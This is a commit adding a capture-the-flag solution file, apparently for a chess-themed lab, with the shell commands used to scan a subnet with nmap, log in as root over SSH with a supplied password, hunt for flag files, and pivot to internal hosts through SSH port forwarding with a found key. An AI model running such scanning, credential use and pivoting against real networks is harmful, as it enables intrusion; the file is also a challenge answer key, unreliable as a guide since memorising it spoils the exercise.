Commit 8e44994
Changed files (1)
solution.md
@@ -0,0 +1,36 @@
+### bchd
+
+``` bash
+cd /root
+ls -al
+cat /root/flag.txt # So, you're finally awake
+apt update
+apt install -y nmap
+nmap -p 1337 -sV 200.200.200.1/24
+ssh root@200.200.200.252 -p 1337
+# password: pawn
+```
+
+### redirector
+
+``` bash
+cat /root/flag.txt # Into the Unknown
+find / -type f -name *.txt
+find / -type f -name *flag*
+cat /tmp/flag.txt # Contact lens
+exit
+```
+
+### bchd
+
+``` bash
+ssh-keygen -y -f /map.txt
+ssh root@200.200.200.252 -p 1337 -NfL 127.0.0.1:2111:200.200.200.111:22
+ss -antp | grep 2111
+ssh -i /map.txt admin@127.0.0.1 -p 2111 # Opening Moves
+TODO: proxychains nmap line to scan for port 2222 on server_1
+ssh -i /map.txt admin@127.0.0.1 -p 2111 -NfL 127.0.0.1:2222:172.16.2.31:2222
+ss -antp | grep 2222
+# create file on bchd with provided key called shaibel
+ssh wshaibel@127.0.0.1 -p 2222 -i wshaibel # Novice Tournamanet
+```